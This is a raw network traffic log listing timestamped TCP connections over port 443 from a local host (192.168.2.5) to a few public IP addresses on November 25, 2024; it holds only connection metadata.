Nov 25, 2024 11:34:31.901309967 CET	50032	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:31.901329994 CET	443	50032	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:31.901343107 CET	50032	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:31.901349068 CET	443	50032	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:31.904006004 CET	50040	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:31.904042006 CET	443	50040	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:31.904113054 CET	50040	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:31.904247999 CET	50040	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:31.904263973 CET	443	50040	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:31.999268055 CET	443	50034	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:32.002331018 CET	443	50034	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:32.004085064 CET	50034	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:32.004132986 CET	50034	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:32.004159927 CET	443	50034	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:32.004172087 CET	50034	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:32.004178047 CET	443	50034	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:32.006716967 CET	50041	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:32.006757975 CET	443	50041	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:32.006849051 CET	50041	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:32.007000923 CET	50041	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:32.007016897 CET	443	50041	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:32.048203945 CET	443	50035	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:32.048237085 CET	443	50035	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:32.048295021 CET	50035	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:32.048326969 CET	443	50035	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:32.048552036 CET	50035	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:32.048564911 CET	443	50035	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:32.048588037 CET	50035	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:32.048774958 CET	443	50035	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:32.048824072 CET	443	50035	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:32.050277948 CET	50035	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:32.051309109 CET	50042	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:32.051331043 CET	443	50042	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:32.051409006 CET	50042	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:32.051569939 CET	50042	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:32.051579952 CET	443	50042	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:32.081155062 CET	443	50037	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:32.081183910 CET	443	50037	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:32.081245899 CET	50037	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:32.081259012 CET	443	50037	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:32.081312895 CET	50037	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:32.082566023 CET	50037	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:32.082587004 CET	443	50037	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:32.121037006 CET	443	50036	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:32.121551037 CET	50036	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:32.121571064 CET	443	50036	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:32.121999025 CET	50036	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:32.122006893 CET	443	50036	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:32.574165106 CET	443	50036	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:32.574352026 CET	443	50036	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:32.574409962 CET	443	50036	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:32.574413061 CET	50036	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:32.574455976 CET	50036	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:32.574572086 CET	50036	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:32.574589014 CET	443	50036	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:32.574599981 CET	50036	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:32.574605942 CET	443	50036	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:32.577517033 CET	50043	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:32.577564001 CET	443	50043	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:32.577837944 CET	50043	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:32.577837944 CET	50043	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:32.577874899 CET	443	50043	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:32.769051075 CET	443	50038	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:32.769120932 CET	443	50038	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:32.769131899 CET	50038	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:32.769150019 CET	443	50038	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:32.769170046 CET	50038	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:32.769216061 CET	50038	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:32.769221067 CET	443	50038	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:32.769260883 CET	50038	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:32.769264936 CET	443	50038	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:32.769308090 CET	50038	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:32.769542933 CET	50038	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:32.769556046 CET	443	50038	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:32.772056103 CET	50044	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:32.772104979 CET	443	50044	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:32.772180080 CET	50044	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:32.772387028 CET	50044	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:32.772402048 CET	443	50044	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:33.634027004 CET	443	50039	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:33.634659052 CET	50039	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:33.634702921 CET	443	50039	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:33.635124922 CET	50039	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:33.635130882 CET	443	50039	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:33.684144020 CET	443	50040	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:33.684643030 CET	50040	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:33.684673071 CET	443	50040	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:33.685249090 CET	50040	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:33.685255051 CET	443	50040	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:33.789369106 CET	443	50041	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:33.790230989 CET	50041	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:33.790251970 CET	443	50041	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:33.790694952 CET	50041	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:33.790699959 CET	443	50041	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:33.834336042 CET	443	50042	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:33.834795952 CET	50042	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:33.834813118 CET	443	50042	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:33.835232019 CET	50042	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:33.835241079 CET	443	50042	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:34.040188074 CET	443	49967	23.219.82.75	192.168.2.5
Nov 25, 2024 11:34:34.040294886 CET	443	49967	23.219.82.75	192.168.2.5
Nov 25, 2024 11:34:34.040360928 CET	49967	443	192.168.2.5	23.219.82.75
Nov 25, 2024 11:34:34.077291965 CET	443	50039	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:34.080533981 CET	443	50039	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:34.080585003 CET	443	50039	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:34.080605984 CET	50039	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:34.080661058 CET	50039	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:34.080873013 CET	50039	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:34.080895901 CET	443	50039	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:34.080909014 CET	50039	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:34.080914974 CET	443	50039	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:34.085239887 CET	50045	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:34.085284948 CET	443	50045	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:34.085364103 CET	50045	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:34.085547924 CET	50045	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:34.085566044 CET	443	50045	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:34.092461109 CET	443	49968	23.219.82.75	192.168.2.5
Nov 25, 2024 11:34:34.092664957 CET	443	49968	23.219.82.75	192.168.2.5
Nov 25, 2024 11:34:34.092717886 CET	49968	443	192.168.2.5	23.219.82.75
Nov 25, 2024 11:34:34.127686024 CET	443	50040	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:34.130779982 CET	443	50040	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:34.130986929 CET	50040	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:34.131073952 CET	50040	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:34.131095886 CET	443	50040	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:34.131109953 CET	50040	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:34.131114960 CET	443	50040	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:34.134197950 CET	50046	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:34.134246111 CET	443	50046	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:34.134354115 CET	50046	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:34.134594917 CET	50046	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:34.134608030 CET	443	50046	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:34.216579914 CET	443	50044	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:34.216648102 CET	50044	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:34.217339039 CET	50044	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:34.217350960 CET	443	50044	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:34.219517946 CET	50044	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:34.219525099 CET	443	50044	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:34.234126091 CET	443	50041	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:34.237370014 CET	443	50041	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:34.237466097 CET	50041	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:34.237530947 CET	50041	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:34.237548113 CET	443	50041	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:34.237557888 CET	50041	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:34.237562895 CET	443	50041	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:34.240628004 CET	50047	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:34.240669966 CET	443	50047	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:34.240747929 CET	50047	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:34.240957022 CET	50047	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:34.240972996 CET	443	50047	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:34.277606010 CET	443	50042	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:34.280781031 CET	443	50042	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:34.280874014 CET	50042	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:34.280936956 CET	50042	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:34.280956030 CET	443	50042	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:34.280981064 CET	50042	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:34.280987024 CET	443	50042	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:34.284126997 CET	50048	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:34.284149885 CET	443	50048	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:34.284231901 CET	50048	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:34.284404039 CET	50048	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:34.284415007 CET	443	50048	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:34.294147015 CET	443	50043	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:34.294620991 CET	50043	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:34.294646025 CET	443	50043	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:34.295089006 CET	50043	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:34.295093060 CET	443	50043	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:34.727694035 CET	443	50043	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:34.731328011 CET	443	50043	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:34.731372118 CET	443	50043	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:34.731424093 CET	50043	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:34.731447935 CET	50043	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:34.731532097 CET	50043	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:34.731548071 CET	443	50043	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:34.731558084 CET	50043	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:34.731564999 CET	443	50043	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:34.734611988 CET	50049	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:34.734630108 CET	443	50049	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:34.734704971 CET	50049	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:34.734915018 CET	50049	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:34.734924078 CET	443	50049	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:35.137609959 CET	443	50044	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:35.137638092 CET	443	50044	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:35.137700081 CET	443	50044	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:35.137723923 CET	50044	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:35.137770891 CET	50044	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:35.138041019 CET	50044	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:35.138057947 CET	443	50044	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:35.172708988 CET	50050	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:35.172755957 CET	443	50050	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:35.172830105 CET	50050	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:35.173022032 CET	50050	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:35.173038006 CET	443	50050	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:35.852411032 CET	443	50046	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:35.853070974 CET	50046	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:35.853108883 CET	443	50046	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:35.853544950 CET	50046	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:35.853560925 CET	443	50046	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:35.864500046 CET	443	50045	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:35.864936113 CET	50045	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:35.864983082 CET	443	50045	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:35.865304947 CET	50045	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:35.865312099 CET	443	50045	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:35.999147892 CET	443	50048	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:35.999689102 CET	50048	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:35.999710083 CET	443	50048	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:36.000143051 CET	50048	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:36.000149012 CET	443	50048	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:36.019615889 CET	443	50047	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:36.020035028 CET	50047	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:36.020051003 CET	443	50047	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:36.020409107 CET	50047	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:36.020418882 CET	443	50047	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:36.286725998 CET	443	50046	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:36.289697886 CET	443	50046	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:36.289745092 CET	443	50046	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:36.289812088 CET	50046	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:36.289844036 CET	50046	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:36.289860010 CET	443	50046	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:36.289870977 CET	50046	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:36.289876938 CET	443	50046	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:36.293526888 CET	50051	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:36.293560028 CET	443	50051	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:36.293665886 CET	50051	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:36.293781042 CET	50051	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:36.293797016 CET	443	50051	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:36.307307005 CET	443	50045	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:36.310714960 CET	443	50045	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:36.312086105 CET	50045	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:36.312128067 CET	50045	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:36.312145948 CET	443	50045	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:36.312158108 CET	50045	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:36.312164068 CET	443	50045	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:36.314554930 CET	50052	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:36.314580917 CET	443	50052	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:36.314665079 CET	50052	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:36.314795017 CET	50052	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:36.314801931 CET	443	50052	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:36.432672024 CET	443	50048	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:36.435996056 CET	443	50048	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:36.436062098 CET	443	50048	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:36.436110973 CET	50048	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:36.436168909 CET	50048	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:36.436803102 CET	50048	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:36.436825037 CET	443	50048	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:36.436836958 CET	50048	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:36.436842918 CET	443	50048	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:36.446445942 CET	50053	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:36.446476936 CET	443	50053	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:36.446584940 CET	50053	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:36.446727037 CET	50053	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:36.446743965 CET	443	50053	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:36.462878942 CET	443	50047	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:36.466094971 CET	443	50047	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:36.468117952 CET	50047	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:36.468142033 CET	50047	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:36.468142033 CET	50047	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:36.468156099 CET	443	50047	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:36.468168020 CET	443	50047	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:36.471417904 CET	50054	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:36.471461058 CET	443	50054	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:36.471534967 CET	50054	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:36.471731901 CET	50054	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:36.471745968 CET	443	50054	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:36.517627001 CET	443	50049	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:36.520376921 CET	50049	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:36.520397902 CET	443	50049	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:36.520788908 CET	50049	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:36.520792961 CET	443	50049	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:36.614310980 CET	443	50050	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:36.614533901 CET	50050	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:36.615322113 CET	50050	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:36.615335941 CET	443	50050	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:36.617089987 CET	50050	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:36.617104053 CET	443	50050	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:36.959805965 CET	443	50049	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:36.963011980 CET	443	50049	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:36.964082956 CET	50049	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:36.964129925 CET	50049	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:36.964129925 CET	50049	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:36.964154959 CET	443	50049	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:36.964164019 CET	443	50049	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:36.967016935 CET	50055	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:36.967060089 CET	443	50055	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:36.967152119 CET	50055	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:36.967323065 CET	50055	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:36.967335939 CET	443	50055	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:37.496078014 CET	443	50050	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:37.496150017 CET	50050	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:37.496161938 CET	443	50050	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:37.496208906 CET	50050	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:37.497252941 CET	50050	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:37.497275114 CET	443	50050	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:38.074074984 CET	443	50051	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:38.074734926 CET	50051	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:38.074765921 CET	443	50051	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:38.075196028 CET	50051	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:38.075201035 CET	443	50051	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:38.094324112 CET	443	50052	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:38.094688892 CET	50052	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:38.094712019 CET	443	50052	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:38.095066071 CET	50052	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:38.095072031 CET	443	50052	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:38.192814112 CET	443	50054	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:38.193610907 CET	50054	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:38.193636894 CET	443	50054	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:38.194077969 CET	50054	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:38.194084883 CET	443	50054	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:38.231041908 CET	443	50053	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:38.231789112 CET	50053	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:38.231827974 CET	443	50053	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:38.233009100 CET	50053	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:38.233022928 CET	443	50053	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:38.275811911 CET	50056	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:38.275866032 CET	443	50056	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:38.275960922 CET	50056	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:38.276170015 CET	50056	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:38.276184082 CET	443	50056	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:38.516937971 CET	443	50051	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:38.520495892 CET	443	50051	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:38.524107933 CET	50051	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:38.525979996 CET	50051	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:38.525998116 CET	443	50051	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:38.526009083 CET	50051	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:38.526015043 CET	443	50051	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:38.529649973 CET	50057	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:38.529675007 CET	443	50057	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:38.529829979 CET	50057	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:38.529968977 CET	50057	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:38.529985905 CET	443	50057	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:38.539189100 CET	443	50052	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:38.542742968 CET	443	50052	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:38.544094086 CET	50052	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:38.544135094 CET	50052	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:38.544151068 CET	443	50052	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:38.544161081 CET	50052	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:38.544164896 CET	443	50052	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:38.546892881 CET	50058	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:38.546932936 CET	443	50058	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:38.547014952 CET	50058	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:38.547358990 CET	50058	443	192.168.2.5	13.107.246.63
